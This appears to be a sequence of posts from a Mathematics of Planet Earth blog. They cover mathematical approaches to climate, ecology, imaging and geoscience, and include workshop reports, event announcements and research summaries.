    Antonios Zagaris (University of Twente) and co-workers discuss the dynamics of phytoplankton patterns in the ocean. Several types of models can be used to study phytoplankton dynamics, among them the so-called NPZ models (coupled ordinary differential equations for nutrient, phytoplankton and zooplankton) and reaction-diffusion systems for the vertical distribution of plankton and nutrient. These models can display very complex behavior, including phytoplankton blooms and spatio-temporal chaos.

    El Niño is a natural climate variability pattern primarily taking place in the tropical Pacific Ocean, with characteristic large-scale sea-surface temperature patterns coupled to associated changes in the atmospheric circulation. Anna von der Heydt and Henk Dijkstra (both University of Utrecht) describe the hierarchy of models that have been developed to understand the physics of this phenomenon and to make predictions of future variability. The predictability of El Niño events is still limited to about 6–9 months due to inherent nonlinear processes.

    Under slowly changing environmental conditions (for example, average rainfall), healthy ecosystems can suddenly collapse to a desert state. Such catastrophic changes can be studied using conceptual models consisting of reaction-diffusion equations, as explained by Arjen Doelman (University of Leiden) and co-workers. The vegetation patterns in these models can destabilize one by one, until the desert state remains as the only stable pattern. The region of stable periodic patterns in the space of pattern wavenumber versus model parameter (for example, rainfall) is sometimes referred to as the “Busse-balloon.”

    In an article by Hans van Duijn and Sorin Pop (both TU Eindhoven), models for porous media flow with multiple fluids (for example, water and oil) are discussed. Such models are important for studying techniques such as geological storage of CO2 and water driven oil recovery. They consist of conservation laws and often contain nonlinearities that preclude the existence of classical solutions, leading to the study of weak solutions, admissible shocks, and saturation overshoots.

    Lightning and other types of electric discharges in the atmosphere (such as elves, sprites, and jets) are difficult to measure and to investigate experimentally. Because of their destructive power and their contribution to greenhouse gases (production of NOx, leading to ozone), numerical simulation is an important tool for studying atmospheric discharges. Christoph Koehn, Margreet Nool and Ute Ebert (all CWI Amsterdam) explain how they simulate discharges with hybrid models that combine a continuum (density) description with a particle model.

    The final article of the NAW MPE theme issue is concerned with seismic inversion. To study subsurface structure, waves are generated with acoustic sources at the Earth (or sea) surface. The reflection of these waves by subsurface layers are measured with special microphones at the surface. Inferring (i.e., reconstructing) the subsurface structure from the reflection data is a challenging inverse problem, as discussed by Chris Stolk (University of Amsterdam).

    Daan Crommelin
    Scientific Computing Group
    CWI Amsterdam
    The Netherlands
    Daan.Crommelin@cwi.nl

    Posted in General | Leave a comment

    ICMS Tipping Points Workshop

    This past week, the International Centre for Mathematical Sciences (ICMS) hosted a workshop in Edinburgh, United Kingdom. The workshop brought together an international group of mathematicians, statisticians, climate scientists, and ecologists to address the topic of tipping points [1]. In particular, the workshop provided a forum for researchers to discuss current topics related to tipping point phenomena, such as signatures of tipping in conceptual models versus in large-scale or data-driven models, how results concerning the time scale or plausibility of tipping may affect policy decisions, and the merits and pitfalls of different early warning signs of tipping.

    Tipping points, a term popularized through the writing of Malcolm Gladwell, have been defined in a broad spectrum of applications, from sociology, to economics, to climatology. The group which met at ICMS consisted of representatives from several of these backgrounds and included members of the Mathematics and Climate Research Network (MCRN), CliMathNet, the Nonlinear Dynamics in Natural Systems (NDNS+) cluster, and the Pacific Institute for Mathematical Sciences (PIMS). These groups are based in the United States, the United Kingdom, the Netherlands, and Canada, respectively.

    Throughout the workshop, the researchers discussed a qualitative definition of a tipping point. We began with the idea that a climate tipping point must:

      1. indicate a rapid change in a climate system or subsystem;
      2. be considered irreversible, or only reversible on a very long timescale; and
      3. have a significant potential impact on the earth system.

    Mathematically, we distinguish between three types of tipping, namely bifurcation-induced tipping, noise-induced tipping, and rate-induced tipping. That is not to say, however, that tipping can only occur through these three phenomena, and possible other phenomena which induce tipping are currently being investigated. Bifurcation-induced tipping is indicated by the presence of a bifurcation of an attractor as a parameter passes through a critical value. In particular, saddle-node bifurcations are usually thought of as describing tipping points. Noise-induced tipping, which is possible when there are at least two stable states, occurs when a perturbation away from a stable attractor pushes a solution out of that attractor’s basin of attraction and into that of another attractor. Rate-induced tipping can occur when varying a parameter in time too swiftly causes a sudden transition.

    The workshop consisted of several days of research presentations, two discussion/breakout sessions, and a poster session. The presentations and posters discussed approaches toward identifying and using early warning signals for sudden regime shifts, examples of how systems exhibiting the different types of tipping have been analyzed, and the relative time scales involved in critical transitions. Non-climate systems that were posed as potential insights into tipping point phenomena included financial crises, ecological regime shifts, and theoretical dynamical systems. The presentations were recorded and will be posted on the ICMS Tipping Points Workshop Website.

    During the discussion sessions, small groups deliberated current problems that were of high interest to researchers, discussed the issues related to these topics, and then reported on their discussion or conclusions. Discussion topics included:

    • Robust/generic indicators to tipping in complex systems;
    • Mechanisms for tipping beyond saddle-nodes (higher than 1-dimension bifurcations);
    • Connections between the predictions in conceptual models and real-world systems;
    • Estimating the radius of the basin of attraction;
    • Nonsmooth phenomena in the climate system;
    • Testing for bi-/multistability in complex systems;
    • Spatial vs. temporal indicators of tipping;
    • Incorporating multiple time series into tipping analysis; and
    • The interaction between noise and attraction.

    Most of these discussions are still ongoing. However, one point of consensus among those at the workshop was the need to test and develop multiple indicators of early warning signs in climate systems, as well as further explore their implications and potential applications. Additionally, we discussed several paths and tools one may use to navigate between the conceptual, intermediate, and large-scale climate models, but the process must be explored further.

    Many workshop participants also emphasized the importance of improving the interface between science and policy. Although it is important to communicate between the different disciplines studying climate, it is equally vital to acknowledge that policy-makers need information that they can implement on a reasonable scale. Informing policymakers about climate assessments in a realistic fashion, which policymakers can then transform into policy decisions, is crucial in working toward decreasing the impact humans are making on the earth system.

    References:

    [1] Lenton, T.M. et al. Tipping elements in the Earthʼs climate system. Proceedings of the U.S. National Academy of Sciences 105, 1786-1793 (2008).

    Kaitlin Hill
    Mathematics and Climate Research Network (MCRN)

    Posted in Climate, Workshop Report | 1 Comment

    The Need for a Theory of Climate

    At the end of August, Nature Climate Change published an interesting paper showing that current global climate models (GCMs) tend to significantly overestimate the warming observed in the last two decades [1]. A few months earlier, Science had published a paper showing that four top-level global climate models, when run on a planet with no continents and entirely covered with water (an “aqua-planet”), produce cloud and precipitation patterns that are dramatically different from one model to another [2]. At the same time, most models tend to underestimate summer melting of Arctic sea ice [3] and display significant discrepancies in the reproduction of precipitation and its trends in the area affected by the Indian summer monsoon. To close the circle, precipitation data in this area also show important differences from one data set to another, especially when solid precipitation (snow) plays a dominant role [4].

    Should we use these results to conclude that climate projections cannot be trusted and that all global warming claims should be revised? Not at all. However, it would be equally wrong to ignore these findings, assume that what we know today is enough, and not invest in further research activities.

    Climate is a complex dynamical system, and we should be aware of the difficulties in properly understanding and predicting it. Global climate models are the most important, perhaps the only type of instrument that the scientific community has at its disposal to estimate the evolution of future climates, and they incorporate the results of several decades of passionate scientific inquiries. However, no model is perfect, and it would be a capital mistake to be content with the current state of description and think that everything will be solved if only we use bigger, more powerful, and faster computers, or organize climate science more along the lines of a big corporation.

    Like all sciences, the study of climate requires observations and data. Today, enormous quantities of high-resolution, precise, and reliable data about our planet are available, provided by satellites and by a dense network of ground stations. The observational data sets are now so large that we have to cope with the serious problems of storing and efficiently accessing the information provided by the many measurement systems active on Earth and making these data available to scientists, decision-makers, and end-users.

    On the other hand, data must be analyzed and interpreted. They should provide the basis for conceptual understanding and for the development of theories. Here, a few problems appear: some parts of the climate system can be described by laws based on “first principles” (the dynamics of the atmosphere and the oceans, or radiative processes in the atmosphere), while others are described by semi-empirical laws. We do not know the equations of a forest, but we do need to include vegetation in our description of climate, as forests are a crucial player in the system. In addition, even for the more “mechanical” components we cannot describe all climatic processes at once: it is not feasible to describe, at the same time, the motion of an entire ocean basin or of the planetary atmosphere and take into account the little turbulent swirls at the scale of a few centimeters.

    Some Feedback Mechanisms in the Climate System

    Climate still has many aspects which are poorly understood, including the role of cross-scale interactions, the dynamics of clouds and of convection, the direct and indirect effects of aerosols, the role of the biosphere, and many aspects of ocean-atmosphere exchanges. To address these issues, the whole hierarchy of modeling tools is necessary, and new ideas and interpretations must be developed. The hydrological cycle, for example, is one of the most important components of the climate of our planet and has a crucial impact on our own life. Still, precipitation intensity and variability are poorly reproduced by climate models, and a huge effort on further investigating such themes is required. Basic research on these topics should continue to provide better descriptions and—ultimately—better models for coping with societal demands. Scientific activities in this field should certainly be coordinated and harmonized by large international programs, but scientific progress will ultimately come from the passion and ingenuity of the individual researchers.

    For all these reasons, parallel to model development and scenario runs we need to focus also on the study of the “fundamentals of climate”, analyzing available data, performing new measurements, using big models and conceptual models, to explore the many fascinating and crucial processes of the climate of our planet which are still not fully understood. While continuing the necessary efforts on data collection, storage, and analysis, and the development of more sophisticated modeling tools, we also need to come up with a theory of climate. In such a construction, the role of climate dynamicists, physicists, chemists, meteorologists, oceanographers, geologists, hydrologists and biologists is crucial, but so is the role of mathematicians. A theory of climate is needed to put together the different pieces of the climatic puzzle, addressing the most important open questions, developing the proper mathematical descriptions, in a world-wide initiative to understand (and, eventually, predict) one of the most fascinating and important manifestations of Planet Earth.

    References

    [1] J.C. Fyfe, N.P. Gillett e F.W. Zwiers, Overestimated global warming over the past 20 years. Nature Climate Change, 3, 767-769, 2013.

    [2] B. Stevens and S. Bony, What are climate models missing? Science, 340, 1053-1054, 2013.

    [3] P. Rampal at al., IPCC climate models do not capture Arctic sea ice drift acceleration: Consequences in terms of projected sea ice thinning and decline. Journal of Geophysical Research — Oceans, 116, DOI: 10.1029/2011JC007110, 2011

    [4] E. Palazzi, J. von Hardenberg and A. Provenzale, Precipitation in the Hindu-Kush Karakoram Himalaya: Observations and future scenarios. Journal of Geophysical Research — Atmospheres, 118, DOI:10.1029/2012JD018697, 2013.

    Antonello Provenzale
    Institute of Atmospheric Sciences and Climate
    Torino, Italy
    A.Provenzale@isac.cnr.it

    Posted in Climate Modeling | 1 Comment

    Probability Measures and Vortex Dynamics

    by Jin Feng (University of Kansas)

    On March 18, 1999, a small aircraft crashed near St. Louis, and the ensuing FAA investigation concluded that the crash was caused by wake turbulence from a helicopter that had just landed ahead of the plane. One of the FAA recommendations was that the characteristics of rotorcraft vortex descent should be more thoroughly investigated, and, in particular, hazards associated with rotor wash generated by helicopters while hovering or in air taxi operation should be investigated. This is some practical motivation for the mathematical work to model vortex dynamics and to understand the behavior of vortices over extended time periods.

    A rigorous mathematical theory of fluid flow in three dimensions is still beyond our understanding, and although the understanding of fluids in two dimensions is much better, there is still much to be done in the mathematical foundations of two-dimensional fluid mechanics. In the middle of the last century the mathematical physicist Lars Onsager proposed an explanation of commonly observed long-time behaviors of 2-D (or nearly 2-D) flows, an explanation that was based on earlier work by C. C. Lin. In Onsager’s work an important principle was codified as the “micro-canonical variational principle” (MVP), which is a relationship between the two fundamental quantities energy and entropy.

    A small research group, of which I am a member, recently met at the American Institute of Mathematics in Palo Alto with the goal of developing a general mathematical framework so that this principle can be derived rigorously from a non-equilibrium probabilistic model of fluid flow. The other group members are Fausto Gozzi (Luiss University in Rome), Tom Kurtz (University of Wisconsin), and Andrzej Swiech (Georgia Tech).

    Our approach requires tools and techniques from many areas of mathematics:

    • vortex dynamics with stochastic disturbances – highly nontrivial due to singularities hidden in the dynamics
    • partial differential equations on spaces of probability measures – highly singular state spaces
    • calculus of variations – the micro-canonical variational principle
    • theory of large deviations – developed for general metric space valued Markov processes

    Here are references that can be consulted to read more about the topics mentioned above:

    1. L. Ambrosio, N. Gigli, G. Savaré, Gradient flows in metric spaces and in the space of probability measures, Birkhauser, 2005.
    2. G. Eyink, K.R. Sreenivasan, Onsager and the theory of hydrodynamic turbulence, Reviews of Modern Physics, 78, Jan. 2006.
    3. J. Feng, M. Katsoulakis, A Comparison Principle for Hamilton-Jacobi equations related to controlled gradient flows in infinite dimensions, Archive for Rational Mechanics and Analysis, 2009.
    4. J. Feng, T. G. Kurtz, Large deviations for stochastic processes}, Mathematical Surveys and Monographs, strong>131, American Mathematical Society, Providence, RI, 2006.
    5. J. Feng, A. Swiech, (with Appendix B by A. Stefanov), Optimal control for a mixed flow of Hamiltonian and gradient type in space of probability measures, Transaction of AMS, 365, 3987-4039.
    6. P. L. Lions, On Euler Equations and Statistical Physics, Scuola Normale Superiore, 1997.
    7. S.R.S. Varadhan, Special Invited Paper: Large Deviations, Annals of Probability, 2008.
    Posted in Mathematics | Leave a comment

    DIMACS/CCICADA Workshop on Urban Planning for Climate Events

    As part of the workshop cluster on Sustainable Human Environments, a preworkshop on urban planning for climate events such as storms, heat events, and floods will be sponsored by DIMACS/CCICADA as part of the Mathematics of Planet Earth 2013+ (MPE2013+) program. The workshop will look at algorithmic tools to make better decisions about adaptation and mitigation for climate events.

    Participants will look at ways to understand a great deal of data that might be relevant to adaptation planning for sea level rise; flight delays, beach erosion, ferry service interruptions, salt water intrusion, water treatment plant operations, power plant location, subway and train track location, and emergency services preparedness. Participants will also consider planning for modifications in the energy, transportation, water supply, waste, and communication sectors. Changes in one sector potentially impact other sectors and so call for mathematical modeling and algorithmic analysis. Algorithmic tools for evaluating, comparing, and making decisions about adaptation and mitigation strategies will also be studied.

    More information on this workshop can be found here and information on the MPE 2013+ program can be found here. Funding is available for early career researchers to participate in the program. Early career researchers are defined as graduate students, postdocs, and faculty/researchers at the beginning of their careers. For more information on the program and financial support, please contact Eugene Fiorini at mpe2013plus@dimacs.rutgers.edu.

    Posted in Sustainability, Workshop Announcement | Leave a comment

    An Afternoon of Geosciences at “Fête de la Science” in Nice, France

    Given the MPE2013 initiative and the role of mathematics in the Earth Sciences research program at the Observatoire de la Côte d’Azur (OCA), a full “Afternoon of Geosciences” will be organized during the “Fête de la Science” on Saturday, October 12, 2013.

    The “Fête de la Science” is an annual event, which lasts five days and attracts one million visitors nationwide. In Nice, in the south of France, local branches of national laboratories collaborate with the University to set up a temporary “Village of Sciences” on the magnificent Château de Valrose campus. This village will offer a venue for interactive demonstrations, posters, discussions, lectures and debates.

    The MPE2013 afternoon will include a series of talks devoted to

    • the role of inverse problems in understanding the interior of the Earth and its exchanges with the exterior environment;
    • the study of natural hazards by rupture processes or by impacts;
    • the use of geometry in the geosciences.

    Designed for the general public, the program is expected to be one of the major attractions of the day on the campus.

    Program:

    14.00-14.15: Corinne Nicolas-Cabane, Ingénieur et Chargée de Communication à Géoazur (UNS-CNRS-OCA-IRD): Ouverture et Introduction

    14.15-14.45: Guust Nolet, professeur à Géoazur (UNS-CNRS-OCA-IRD): Tomographie terrestre: comment la planète Terre perd ses calories

    14.45-15.15: Stéphane Bouissou et Alexandre Chemanda, Chercheurs à Géoazur (UNS-CNRS-OCA-IRD): Modélisation des processus de rupture des enveloppes superficielles de la Terre: applications à la prospection et à la gestion des ressources naturelles, au stockage des déchets et à la prévision des aléas géologiques

    15.15-15.45: Stéphane Operto et Clara Castellanos, Chercheur et doctorante à Géoazur (UNS-CNRS-OCA-IRD): Les ondes sismiques: un outil pour l’auscultation de l’intérieur de la Terre

    15.45-16.15: Letizia Stephanelli, Post-doctorante à Géoazur (UNS-CNRS-OCA-IRD): Ordre et désordre dans l’espace autour de la Terre

    16.15-16.45: Sadrac Saint Fleur, Doctorant à Géoazur (UNS-CNRS-OCA-IRD): La formule de Leibniz (barycentre) et ses applications

    16.45-17.15: Patrick Michel, Chercheur à Lagrange (UNS-CNRS-OCA): Astéroïdes : conquête spatiale et risques d’impacts

    Posted in Public Event | Leave a comment

    The Mathematics Behind Biological Invasions

    Invasive species are a big deal today. One need only do a simple Google search and see all the exotic species that are hitching a ride on container cargo to find a niche on a new continent. The U.S. Environmental Protection Agency (EPA) has a web site devoted to invasive species; the U.S. National Oceanographic and Atmospheric Agency (NOAA) also has a web site on this topic.

    There are a lot of discussions in the scientific literature as well addressing topics from ecology to biological diversity. Interestingly, there is a long history of contributions in the mathematical literature to this topic as well. One such example is the work of Mark Lewis, captured in part in his invited talk at the Mathematical Congress of the Americas in Guanajuato, Mexico in July 2013.

    Mathematicians construct and analyze models of biological invasions, asking questions like “Can the invader establish itself (and under what conditions)?” and “will the invading population spread (and if so, how fast)?”

    Lewis, in his talk “The Mathematics Behind Biological Invasion Processes,” looked at the second of these questions, focusing on the spread of populations. Such models must take into account the growth rate of the population under various conditions as well as the diffusion of the population.

    Populations may compete with other species or cooperate. Lewis gave two examples. The first example was the invasion of the grey squirrel into the U.K., a country where the red squirrel had been prevalent prior to the introduction of the grey squirrel in the 19th century. Interacting species can compete for similar resources. Grey squirrels are larger and more aggressive than their cousins. Will their population eventually replace the red squirrel? Lewis discusses various mathematical models and the conclusion.

    A second example is West Nile Virus, introduced into the U.S. in the late 1990s. The spread of the virus depends on hosts (birds and mosquitoes in this case) and has spread rapidly since its introduction.

    A notable feature of mathematics is that seemingly disparate phenomena can have very similar mathematical models. The mathematics lends itself to analysis that can be applied generally to many different situations. Lewis traces some of the early history of such models, going back to the work of R.A. Fisher, through to modern dynamical systems.

    One can learn about the mathematics behind biological invasions by listening to the recording of the talk online and looking for “Mark A. Lewis – The mathematics behind biological invasion processes.”

    Posted in Biodiversity, Ecology, Mathematics | Leave a comment

    Training a New Generation of Climate Scientists

    I have been involved in the organization of a one-week educational workshop Mathematics of Climate Change, Related Hazards and Risks, which took place in Centro de Investigación Matemáticas (CIMAT) in Guanajuato (Mexico) from July 29 to August 2, 2013, as a satellite activity of the Mathematical Congress of the Americas 2013. The workshop was a joint initiative of the International Mathematical Union (IMU), the International Union of Geodesy and Geophysics (IUGG), and the International Union of Theoretical and Applied Mechanics (IUTAM), and was supported by a major grant from the International Council of Science (ICSU), and by CIMAT, the three unions IMU, IUGG and IUTAM, and the International Council of Industrial and Applied Mathematics (ICIAM). The members of the Scientific Committee were Susan Friedlander (University of Southern California/IMU), Paul Linden (University of Cambridge/IUTAM) and Ilya Zaliapin (University of Nevada, Reno/IUGG).

    The workshop was attended by 41 participants: 30 regular participants (including 17 from Latin America), eight invited speakers, and the three organizers.

    The scientific program consisted of eight minicourses of three hours each, given by Graciela Canzani (Argentina), Michael Ghil (France and US), Eugenia Kalnay (US), Roberto Mechoso (US), George Philander (US), Bala Rajaratnam (US), Eli Tziperman (US), Oscar Velaso Fuentes (Mexico), as well as a poster session, poster presentations, and two round tables. Most lecturers stayed on site for the duration of the workshop and interacted with the participants. The lectures focused on three themes: (1) Methodology of climate and natural hazards research, (2) Climate change and environmental hazards, and (3) Socio-economic implications of climate change and extreme hydro-meteorological hazards.

    Among other topics, the lectures highlighted the recent successes in meteorology, where better models and better data assimilation techniques have led to significant improvements in the quality of the forecasts, including seasonal forecasts as El Niño and La Niña. Global ocean circulation was explained, together with its implications for climate and the seasonal phenomena. The difficulty of including clouds in climate models and the uncertainty it induces were discussed at length: low-altitude clouds cool the atmosphere, while high-altitude clouds warm it. To understand the climate of the future, it is helpful to understand the climates of the past, from the very warm climates that could have been equable (i.e., with small differences of temperature between the Equator and the poles) to Snowball Earth, for which a model of ocean circulation was described. The mathematics of tornadoes and of Lagrangian coherent structures in ocean and atmospheric circulation were also described. Two sets of lectures dealt with the difficulties of working and interpreting real data, whether from remote sensing or the analysis of proxies.

    The final round table was targeted towards collecting the participants’ opinions about the program and organization of the event. Most of the participants indicated that they had learned a lot and that the workshop achieved the goal of being educational and capacity building. It had allowed them to make contacts and get to know personally some of the leaders in the field, as well as to become familiar with the current research trends and challenges. Several participants mentioned that they had had trouble in the past finding mathematicians interested in applications, and some acknowledged that they were now able to apply their expertise. The contacts with geophysicists were very welcome. The rigor of the lecturers was appreciated, as well as the fact that the lecturers were conscious of the weaknesses of the models. They expressed the opinion that the lecturers behaved ethically by presenting science not as a religion and by pointing out the weak points and areas where more work or better models are needed. Among the suggestions, it was noted that it would have been good to have some time for hands-on work with data sets on a specific problem. It was also mentioned that there could have been more mathematicians as opposed to geophysicists at the workshop.

    The workshop lectures have been recorded by a professional firm. They will be posted very soon on YouTube and made accessible from the websites of CIMAT, MPE, and IMU.

    In the opinion of the organizers, such a workshop is very useful and really fills a need in the scientific community. This is particularly true for the scientists from Latin America and the Caribbean, as well as other developing regions, whose direct contact with the leading researchers in regular meetings is limited due to monetary and logistic issues. The organizers were impressed by the dedication of the lecturers to their role as instructors. It was clear that the lecturers shared the opinion of the organizers that proactive actions should be taken to encourage more young researchers to get involved in climate studies. The format of the workshop seemed adequate for that purpose, in particular in view of the fact that the lectures were videotaped to enable the students to fill in details they might have missed during the workshop.

    Christiane Rousseau

    Posted in Workshop Report | Leave a comment

    Microlocal Analysis and Imaging

    Modern society is increasingly dependent on imaging technology. Medical imaging has become a vital part of healthcare, with X-ray tomography, MRI, and ultrasound being used daily for diagnostics and treatment monitoring of various diseases; meteorological radar predicts weather, sonar scanners produce sea-floor maps, and seismometers aid in geophysical exploration.

    In these techniques, the imaged medium is probed by certain physical signals (X-rays, electromagnetic or sound waves, etc.) and the response is recorded by a set of receivers. For example, in computerized tomography (CT), X-rays are sent at various angles through the human body and the intensity of outgoing rays is measured. In ultrasound tomography sound waves are sent through the body and the transducers located on the surface of the body collect the resulting echoes.

    Imaging modalities differ in the physical nature of input and output signals, their interaction with the medium, as well as geometric setups of data acquisition. As a result, the mathematical description of the underlying processes and collected data are different, too. However, many of them fall into a common mathematical framework based on integral geometry and the wave equation. In particular, one can model scattered waves (the recorded data) as integrals along certain trajectories of a function that describes physical or biological properties of the medium. In order to create an image of the medium, one would like to recover the latter function from the data, i.e., to invert the integral transform. Integral geometry is a branch of mathematics that studies properties of such transforms and their inversion.  For example, in X-ray tomography, the data are essentially integrals of the density of the object over lines.

    In many imaging applications, recovering the unknown function modeling the medium is not possible—either because the data are complicated or because not enough data are taken to obtain exact reconstruction formulas.  In fact, full knowledge of the function is not always necessary. For example, if one is looking for a tumor in a part of the human body, then the location and shape of the tumor are already useful information even if the exact values of the tumor density are not recovered. The location of the tumor can be easily determined from the singular support of the density function of the body, which is the set of points where the function changes values abruptly. For example, the electromagnetic absorption coefficient of a cancerous tissue is far greater than that of a healthy tissue. A better understanding of the tumor regions can be obtained if we can recover the shape of the tumor as well. In other words, more precise information can be had if we can attach certain directions to the singular support at a point. In mathematical terms, such information can be obtained by looking at the Fourier transform of the function. A smooth function that is zero in the complement of any ball has the property that its Fourier transform decays rapidly at infinity; in other words, the decay at any point is faster than any negative power of the distance of that point from the origin.  One could then study the local behavior as well as the directional behavior of a function near a singular point by localizing the function near that point and by looking at the directions where its (localized) Fourier transform is not rapidly decaying. Such directions are in the wavefront set of the function. For example, if f is the function that takes the values 1 inside and 0 outside the disk in Figure 1, then the function is not smooth at the boundary circle. The wavefront directions are those normal to the boundary. Intuitively, these are the directions at which the jump in values of f at the boundary is most dramatic. Microlocal analysis is the study of such singularities and what operators (such as those in tomography) do to them.

    Figure 1 This picture represents the function that takes the values 1 inside and 0 outside the circle.  The wavefront set is the set of normals to the boundary of the disk.

    In cases where exact reconstruction formulas are not possible, approximate backprojection reconstruction can be used. Microlocal analysis of such reconstruction operators gives very useful information.  Let f be a function and let x be a point one wants to image (i.e.,. find f(x)). The data are integrals of f over lines the X-rays traverse.  Figure 2 shows what happens when f is the function that takes the values 1 inside and 0 outside the disk.  For each line L in the plane, the data Rf(L) is the length of the intersection of L with the disk.  So, Rf(L) is 0 if L does not meet the disk and Rf(L) is the value of the diameter of the circle if L goes through the center of the disk.  For such functions g(L) defined on a set of lines one can define a backprojection operator R*, which maps g(L) to a function h(x) as follows. For every fixed x, the value h(x) is equal to the “average” of g(L) over all L passing through x. Now, applying R* to Rf one obtains the so-called normal operator of f, which is often used as an “approximate reconstruction operator” of f, i.e., h(x)=R*Rf(x) is an approximation to f. The study of normal operators and how well h(x) approximates f(x) in a given setup is one of the important problems in integral geometry. Ideally, one would like to have a situation when the wavefront set of h is the same as that of f.  In this case, the singularities of the reconstruction, h, would be in the same locations as f. However, in many cases h may have some additional singularities (artifacts) or lack some of the singularities of f. One of the goals in such cases is to describe these artifacts, find their strengths, and diminish them as much as possible.

     

    Figure 2 A disk and the backprojection reconstruction from X-ray data.  The lines in the data set are horizontal and vertical and lines at 45 and 135 degrees. Note how the reconstruction “backprojects” the values of the line integrals over all points in the line.  Then, these are added up to get the reconstruction.  With lines in more angles, the reconstruction will look much better.

    Similar problems arise for transforms integrating along other types of curves, for example the transform R that integrates over ellipses with foci on the x-axis. This elliptical transform is related to the model of bistatic radar [4].  In this case, the reconstruction operator includes a backprojection plus a sharpening algorithm.  The ellipses have foci in the interval [-3,3] along the x-axis.  The function to be reconstructed is the characteristic function of a disk above the x-axis.  Two important limitations of backprojection reconstruction methods are visible in this reconstruction.  First, the top and bottom of the disk are visible but the sides are not.  Second, there is a copy of the disk below the x-axis, although the object is above the axis. This is to be expected because the ellipses are all symmetric with respect to the x-axis—an object above the axis would give the same data as its mirror image below the axis.

    Figure 3 Reconstruction of a disk on the y-axis from integrals over ellipses centered on the x-axis and with foci in [-3,3].  Notice that some boundaries of the disk are missing.  There is a copy of the disk below the axis [Howard Levinson, Senior Honors Thesis, Tufts University, 2011].

    This same left-right ambiguity happens in synthetic aperture radar [5] [7], and it is important to understand the nature of the artifacts and why they appear.  As can be seen in Figure 3, there is an artifact below the flight path.  The artifact is as pronounced as the original disk, and microlocal analysis shows that such artifacts will always be as strong as the original object (e.g., [1]).   However, if the flight path is not straight, microlocal analysis shows that the artifacts change position, and in certain cases, some artifacts can be eliminated [2, 6]. This problem comes up in other areas, such as electron microscopy and SPECT [3].

    REFERENCES

    [1]   G. Ambartsoumian, R. Felea, V. Krishnan, C. Nolan, and E.T. Quinto, A class of singular Fourier integral operators in synthetic aperture radar imaging,  Journal of Functional Analysis, 264 (2013), 246-269.

    [2]   R. Felea, Displacement of artifacts in inverse scattering, Inverse Problems 23 (2007) 1519–1531.

    [3]   R. Felea and E.T. Quinto, The microlocal properties of the local 3-D SPECT operator, SIAM J. Math Anal., 43 (2011), 1145–1157.

    [4]   V. Krishnan and E.T. Quinto, Microlocal aspects of bistatic synthetic aperture radar imaging, Inverse Problems and Imaging, 5 (2011), 659-674.

    [5]   C.J. Nolan and M. Cheney, Microlocal analysis of synthetic aperture radar imaging. J. Fourier Anal. Appl., 10(2) (2004), 133–148.

    [6]   P. Stefanov and G. Uhlmann, Is a curved flight path in SAR better than a straight one?, SIAM J. Appl. Math., 2013, to appear.

    [7]   L. Wang, C. E. Yarman, B. Yazici, “Theory of Passive Synthetic Aperture Imaging,” in Excursions in Harmonic Analysis, Volume 1, Springer-Birkhauser Applied and Numerical Harmonic Analysis (ANHA) book series, Editors: T.D. Andrews.; R. Balan; J.J. Benedetto; W. Czaja; K.A. Okoudjou; 2013, XI, 519 p., ISBN 978-0-8176-8375-7.

    Gaik Ambartsoumian, University of Texas, Arlington, TX
    Raluca Felea, Rochester Institute of Technology, NY
    Venky Krishnan, Tata Institute of Fundamental Research Centre for Applicable Mathematics, Bangalore, India
    Cliff Nolan, University of Limerick, Ireland
    Todd Quinto, Tufts University, Medford, MA

    Posted in Imaging, Mathematics | Leave a comment

    Ocean Acidification and Phytoplankton

    The health of the world’s oceans has been in the news a lot over the last few months. Recent reports suggest that the oceans are absorbing carbon dioxide at unprecedented rates. The ocean is the dominant player in the global carbon cycle, and the sequestering of more carbon dioxide—a major greenhouse gas—sounds like a good thing. However, researchers have measured significant increases in ocean acidity, and they worry that this will have a negative impact on marine life, especially phytoplankton.

    That would be a big deal, as phytoplankton, which are the foundation of the ocean food chain, are vitally important to life on Earth. They capture the radiant energy from the sun, converting carbon dioxide into organic matter, and they produce half of the Earth’s oxygen as a by-product.

    The amount and distribution of phytoplankton in the world’s oceans are measured in two ways. Remote sensing satellites in space detect chlorophyll pigments by quantifying how green the oceans are. Since the amount of phytoplankton is proportional to that of chlorophyll, this technique measures the amount of near-surface chlorophyll over a very large scale.

    A second, more accurate and mathematically intensive approach uses special cameras lowered into the ocean to measure the radiance field in the water, both at the surface and at various depths. These measurements are then used to infer the properties of the water and its constituents. The ocean’s radiance field is determined primarily by the sun and sky and is influenced by a host of factors, including the behavior of the air-sea interface, the inherent optical properties of the water, scattering effects, etc. Determining the makeup of the water from the measured radiance distribution has proven to be a difficult inverse problem for oceanographers to solve.

    The first step to solving this problem is having a precise specification of the radiance field. This provides oceanographers with the means to calculate quantities that can be used to assess phytoplankton populations. This is the subject of work by researchers Marlon Lewis and Jianwei Wei of Dalhousie University in Nova Scotia, supported by the Mitacs Accelerate internship program.

    Lewis and Wei helped to develop a new camera that can be used as an oceanographic radiometer. The high resolution device makes it possible to resolve the spherical radiance distribution at high frequency at surface and at depth. Their work established the precision and reliability of the radiance camera and has provided scientists with a new tool to monitor phytoplankton populations as well as the health of the world’s oceans.

    Dr. Arvind Gupta,
    CEO & Scientific Director
    Mitacs

    Posted in Biosphere, Inverse Problems, Ocean | Leave a comment

    AGU Releases Revised Position Statement on Climate Change

    The American Geophysical Union (AGU) recently released a revised version of its position statement on climate change. Titled “Human-induced Climate Change Requires Urgent Action,” the statement declares that “humanity is the major influence on the global climate change observed over the past 50 years” and that “rapid societal responses can significantly lessen negative outcomes.”

    Learn more.

    Read the full statement (pdf).

    Posted in Climate Change | Leave a comment

    How Vegetation Competes for Rainfall in Dry Regions

    The greater the plant density in a given area, the greater the amount of rainwater that seeps into the ground. This is due to a higher presence of dense roots and organic matter in the soil. Since water is a limited resource in many dry ecosystems, such as semi-arid environments and semi-deserts, there is a benefit to vegetation to adapt by forming closer networks with little space between plants.

    Desert Steppes in Yol Valley, Mongolia

    Desert steppes in Yol Valley in Mongolia. Photo Credit: Christineg (Source: Dreamstime)

    Tiger bush plateau in Niger

    Tiger bush plateau in Niger (Vertical aerial view). Vegetation is dominated by Combretum micranthum and Guiera senegalensis. Image size : 5 x 5 km on the ground. Satellite image from the Declassified corona KH-4A national intelligence reconnaissance system, 1965-12-31. Courtesy of the U.S. Geological Survey. Photo source: Wikimedia

